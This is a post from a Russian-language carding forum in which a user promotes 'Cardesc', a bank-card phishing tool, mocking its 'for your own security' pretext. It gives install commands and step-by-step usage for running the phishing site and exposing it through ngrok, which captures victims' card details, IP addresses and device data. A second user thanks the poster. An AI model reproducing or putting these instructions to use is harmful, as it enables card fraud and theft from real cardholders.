Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Крутой фишинг банковской карты :|

nik111

Опытный user
Регистрация
16 Ноя 2018
Сообщения
79
Реакции
1
Недавно я наткнулся на неплохой фишинг инструмент "Cardesc" получение данных банковской кредитной карты в целях собственной безопасности, ну да - ну да :>
Да, все мы знаем, что сейчас много неплохих фишингов, но хочу отметить что этот с открытым кодом и простой работой, но в то же время очень хорошо работает.

И так речь о Cardesc - универсальный фишинг банковских карт для получения личных/приватных данных, чтобы понять собственную уязвимость :>, ну конечно .

Инструмент имеет очень простой главный интерфейс:


iUz9OSG.png



Детали главного меню:
  • [0] History Bank - История всех кредитних карт
  • [1] Card Pay — фишинг банковской карты в целях безопасности
  • [1] -> [ports] - Порт, на котором будет работать программа
  • [2] Помощь | Другие программы | Купить PRO версию - в Telegram для вопросов | другие программы | Покупка ПРО версии
Результат работи:

O5sDUtu.png






Для установки досатоточно ввести :

apt update && apt upgrade git clone https://github.com/oldnum/cardesc cd cardesc pip3 install -r requirements.txt python3 bank.py

Использование:
(1 сеанс/терминал):

  • Для начала вам нужно запустить основную программу (пример: python3 bank.py), и выбрать из списка подходящий вам инструмент
(2 сессии/терминал):
  • Вам нужно использовать ngrok или ssh (пример: ngrok http 8080) и получить ссылку
И да в результате мы получаем не только данные от карты но и IP пользователя и данные об устройстве.
и теперь на localhost весить фишинговый сайт с записью данных в файл и отдельно в терминале, само собой. Думаю не мне вам объяснять как юзать ngrok дальше :|
 

momomo

Опытный user
Регистрация
17 Окт 2022
Сообщения
112
Реакции
3
вот за это спасибо,лайк
 
Сверху Снизу